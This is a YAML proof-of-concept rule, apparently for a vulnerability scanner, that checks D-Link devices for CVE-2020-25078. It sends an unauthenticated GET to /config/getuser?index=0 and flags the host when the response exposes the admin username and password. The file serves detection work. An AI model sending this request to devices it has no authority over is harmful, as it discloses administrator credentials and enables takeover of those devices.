name: poc-yaml-dlink-cve-2020-25078-account-disclosure
rules:
  - method: GET
    path: >-
      /config/getuser?index=0
    follow_redirects: false
    expression: |
      response.status == 200 && response.headers["Content-Type"].contains("text/plain") && response.body.bcontains(b"name=admin") && response.body.bcontains(b"pass=")

detail:
  author: kzaopa(https://github.com/kzaopa)
  links:
    - https://mp.weixin.qq.com/s/b7jyA5sylkDNauQbwZKvBg